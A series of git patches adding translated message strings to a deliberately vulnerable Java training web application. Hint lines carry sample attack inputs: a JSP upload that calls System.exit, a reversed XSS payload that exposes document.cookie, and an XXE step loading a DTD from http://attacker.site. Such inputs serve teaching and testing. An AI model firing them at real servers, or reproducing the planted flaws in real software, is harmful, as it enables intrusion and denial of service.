msg.invalid.json=Invalid JSON \: {0} +msg.is.leap.year=It's a leap year. +msg.is.not.leap.year=It insn't a leap year. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -249,6 +254,7 @@ msg.note.sqlijc=You can see a secret number if you enter Mark and < msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. +msg.note.threadunsafe=If you send many requests from multiple clients at the same time, java.lang.NumberFormatException will be thrown. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -266,6 +272,7 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.year=Please select an year. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} @@ -332,6 +339,7 @@ title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count title.threadstarvation.page=Access Status +title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From f540994c63a9953d50f7fe3e80129560b423e9cf Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 23 Oct 2019 13:51:13 +0900 Subject: [PATCH 102/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index b453c33..4310633 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -55,6 +55,7 @@ function.description.slow.unnecessary.object.creation=It takes time to respond d function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.thread.starvation=Thread starvation can occur. +function.description.thread.unsafe=A class that is not thread-safe is used in this page. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -100,6 +101,7 @@ function.name.slow.unnecessary.object.creation=Delay due to unnecessary object c function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak function.name.thread.starvation=Thread Starvation +function.name.thread.unsafe=Using Non-Thread-Safe Class function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -120,6 +122,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page label.goto.admin.page=Go to admin main page @@ -205,6 +208,8 @@ msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} +msg.is.leap.year=It's a leap year. +msg.is.not.leap.year=It insn't a leap year. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -249,6 +254,7 @@ msg.note.sqlijc=You can see a secret number if you enter Mark and < msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. +msg.note.threadunsafe=If you send many requests from multiple clients at the same time, java.lang.NumberFormatException will be thrown. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -266,6 +272,7 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.year=Please select an year. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} @@ -332,6 +339,7 @@ title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count title.threadstarvation.page=Access Status +title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From 5acac2a02cd3aac77d155a8bd720270c81f521b3 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 23 Oct 2019 13:51:15 +0900 Subject: [PATCH 103/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index b453c33..4310633 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -55,6 +55,7 @@ function.description.slow.unnecessary.object.creation=It takes time to respond d function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.thread.starvation=Thread starvation can occur. +function.description.thread.unsafe=A class that is not thread-safe is used in this page. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -100,6 +101,7 @@ function.name.slow.unnecessary.object.creation=Delay due to unnecessary object c function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak function.name.thread.starvation=Thread Starvation +function.name.thread.unsafe=Using Non-Thread-Safe Class function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -120,6 +122,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page label.goto.admin.page=Go to admin main page @@ -205,6 +208,8 @@ msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} +msg.is.leap.year=It's a leap year. +msg.is.not.leap.year=It insn't a leap year. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -249,6 +254,7 @@ msg.note.sqlijc=You can see a secret number if you enter Mark and < msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. +msg.note.threadunsafe=If you send many requests from multiple clients at the same time, java.lang.NumberFormatException will be thrown. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -266,6 +272,7 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.year=Please select an year. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} @@ -332,6 +339,7 @@ title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count title.threadstarvation.page=Access Status +title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From be8eb385c11c6c0c4ff203b268d58b95ec4b319d Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 23 Oct 2019 13:51:17 +0900 Subject: [PATCH 104/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 75b0902..9cdeb22 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -55,6 +55,7 @@ function.description.slow.unnecessary.object.creation=It takes time to respond d function.description.sql.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fSQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.thread.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 function.description.thread.starvation=Thread starvation can occur. +function.description.thread.unsafe=A class that is not thread-safe is used in this page. function.description.throwable=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001{0}\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 function.description.truncation.error=\u6253\u3061\u5207\u308a\u8aa4\u5dee\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 function.description.unintended.file.disclosure=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u610f\u56f3\u3057\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u516c\u958b\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 @@ -100,6 +101,7 @@ function.name.slow.unnecessary.object.creation=\u4e0d\u5fc5\u8981\u306a\u30aa\u3 function.name.sql.injection=SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 function.name.thread.leak=\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af function.name.thread.starvation=Thread Starvation +function.name.thread.unsafe=Using Non-Thread-Safe Class function.name.truncation.error=\u6253\u3061\u5207\u308a\u8aa4\u5dee function.name.unintended.file.disclosure=\u610f\u56f3\u3057\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u516c\u958b function.name.unrestricted.ext.upload=\u62e1\u5f35\u5b50\u5236\u9650\u306e\u7121\u3044\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 @@ -120,6 +122,7 @@ label.character.count=\u6587\u5b57\u6570 label.code=\u30b3\u30fc\u30c9 label.content=\u672c\u6587 label.current.thread.count=\u73fe\u5728\u306e\u30b9\u30ec\u30c3\u30c9\u6570 +label.determine=Determine label.execution.result=\u5b9f\u884c\u7d50\u679c\: label.go.to.main=\u30e1\u30a4\u30f3\u30da\u30fc\u30b8\u3078 label.goto.admin.page=\u7ba1\u7406\u8005\u30e1\u30a4\u30f3\u30da\u30fc\u30b8\u3078 @@ -205,6 +208,8 @@ msg.error.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u306a\ msg.executed.batch=\u30d0\u30c3\u30c1\u3092\u4f5c\u6210\u3001\u5b9f\u884c\u3057\u307e\u3057\u305f\: msg.invalid.expression=\u4e0d\u6b63\u306a\u6570\u5f0f\u3067\u3059 \: {0} msg.invalid.json=\u4e0d\u6b63\u306aJSON\u6587\u5b57\u5217\u3067\u3059 \: {0} +msg.is.leap.year=It's a leap year. +msg.is.not.leap.year=It insn't a leap year. msg.low.alphnum8=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f8\u6841\u306e\u82f1\u6570\u5b57\u3067\u3059\u3002 msg.mail.change.failed=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306e\u5909\u66f4\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 msg.mail.changed=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306f\u6b63\u5e38\u306b\u5909\u66f4\u3055\u308c\u307e\u3057\u305f\u3002 @@ -249,6 +254,7 @@ msg.note.sqlijc=You can see a secret number if you enter Mark and < msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. +msg.note.threadunsafe=If you send many requests from multiple clients at the same time, java.lang.NumberFormatException will be thrown. msg.note.truncationerror=3\u30017\u30019\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6253\u3061\u5207\u308a\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 @@ -266,6 +272,7 @@ msg.question.reach.the.moon=0.1mm\u306e\u539a\u3055\u306e\u7d19\u3092\u4f55\u56d msg.reverse.color=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 msg.reverse.color.complete=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u304c\u5b8c\u4e86\u3057\u307e\u3057\u305f\u3002 msg.reverse.color.fail=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 +msg.select.year=Please select an year. msg.select.upload.file=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.sent.mail=\u30e1\u30fc\u30eb\u304c\u6b63\u5e38\u306b\u9001\u4fe1\u3055\u308c\u307e\u3057\u305f\u3002 msg.unknown.exception.occur=\u4f55\u3089\u304b\u306e\u4f8b\u5916\u304c\u767a\u751f\u3057\u307e\u3057\u305f \: {0} @@ -332,6 +339,7 @@ title.sqlijc.page=\u6697\u8a3c\u756a\u53f7\u691c\u7d22 title.strplusopr.page=\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210 title.threadleak.page=\u73fe\u5728\u306e\u30b9\u30ec\u30c3\u30c9\u6570\u306e\u8868\u793a title.threadstarvation.page=Access Status +title.threadunsafe.page=Leap year determination title.truncationerror.page=\u5c0f\u6570\u306e\u5272\u308a\u7b97 title.unrestrictedextupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db title.unrestrictedsizeupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2 From 8ca744d8cc836241e3c3587c8f1c94edf30c18fa Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 23 Oct 2019 13:51:18 +0900 Subject: [PATCH 105/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index b453c33..4310633 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -55,6 +55,7 @@ function.description.slow.unnecessary.object.creation=It takes time to respond d function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.thread.starvation=Thread starvation can occur. +function.description.thread.unsafe=A class that is not thread-safe is used in this page. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -100,6 +101,7 @@ function.name.slow.unnecessary.object.creation=Delay due to unnecessary object c function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak function.name.thread.starvation=Thread Starvation +function.name.thread.unsafe=Using Non-Thread-Safe Class function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -120,6 +122,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page label.goto.admin.page=Go to admin main page @@ -205,6 +208,8 @@ msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} +msg.is.leap.year=It's a leap year. +msg.is.not.leap.year=It insn't a leap year. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -249,6 +254,7 @@ msg.note.sqlijc=You can see a secret number if you enter Mark and < msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. +msg.note.threadunsafe=If you send many requests from multiple clients at the same time, java.lang.NumberFormatException will be thrown. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -266,6 +272,7 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.year=Please select an year. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} @@ -332,6 +339,7 @@ title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count title.threadstarvation.page=Access Status +title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From 95543d8b1ca33295ffaeb14454159a96c4dfb361 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 23 Oct 2019 13:51:20 +0900 Subject: [PATCH 106/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index b453c33..4310633 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -55,6 +55,7 @@ function.description.slow.unnecessary.object.creation=It takes time to respond d function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.thread.starvation=Thread starvation can occur. +function.description.thread.unsafe=A class that is not thread-safe is used in this page. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -100,6 +101,7 @@ function.name.slow.unnecessary.object.creation=Delay due to unnecessary object c function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak function.name.thread.starvation=Thread Starvation +function.name.thread.unsafe=Using Non-Thread-Safe Class function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -120,6 +122,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page label.goto.admin.page=Go to admin main page @@ -205,6 +208,8 @@ msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} +msg.is.leap.year=It's a leap year. +msg.is.not.leap.year=It insn't a leap year. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -249,6 +254,7 @@ msg.note.sqlijc=You can see a secret number if you enter Mark and < msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. +msg.note.threadunsafe=If you send many requests from multiple clients at the same time, java.lang.NumberFormatException will be thrown. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -266,6 +272,7 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.year=Please select an year. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} @@ -332,6 +339,7 @@ title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count title.threadstarvation.page=Access Status +title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From daf288491399dac8425efb0fb90ed29151d8ba0a Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 23 Oct 2019 13:51:22 +0900 Subject: [PATCH 107/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index b453c33..4310633 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -55,6 +55,7 @@ function.description.slow.unnecessary.object.creation=It takes time to respond d function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.thread.starvation=Thread starvation can occur. +function.description.thread.unsafe=A class that is not thread-safe is used in this page. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -100,6 +101,7 @@ function.name.slow.unnecessary.object.creation=Delay due to unnecessary object c function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak function.name.thread.starvation=Thread Starvation +function.name.thread.unsafe=Using Non-Thread-Safe Class function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -120,6 +122,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page label.goto.admin.page=Go to admin main page @@ -205,6 +208,8 @@ msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} +msg.is.leap.year=It's a leap year. +msg.is.not.leap.year=It insn't a leap year. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -249,6 +254,7 @@ msg.note.sqlijc=You can see a secret number if you enter Mark and < msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. +msg.note.threadunsafe=If you send many requests from multiple clients at the same time, java.lang.NumberFormatException will be thrown. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -266,6 +272,7 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.year=Please select an year. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} @@ -332,6 +339,7 @@ title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count title.threadstarvation.page=Access Status +title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From 6121561312dab9c73c123ec161756e6547adef5f Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Thu, 24 Oct 2019 22:06:26 +0900 Subject: [PATCH 108/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index 4310633..a04ce8f 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -62,6 +62,7 @@ function.description.unintended.file.disclosure=There is an unintended file disc function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -107,6 +108,7 @@ function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages +function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -114,6 +116,8 @@ function.name.xxe=XXE (XML External Entity) label.access.time=Access Time label.access.number=Number of Accesses label.attach.file=Attach File +label.attribute.name=Attribute Name +label.attribute.value=Attribute Value label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate @@ -210,6 +214,7 @@ msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} msg.is.leap.year=It's a leap year. msg.is.not.leap.year=It insn't a leap year. +msg.login.with.openid.provider=Login with {0} msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -259,6 +264,7 @@ msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -343,6 +349,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File 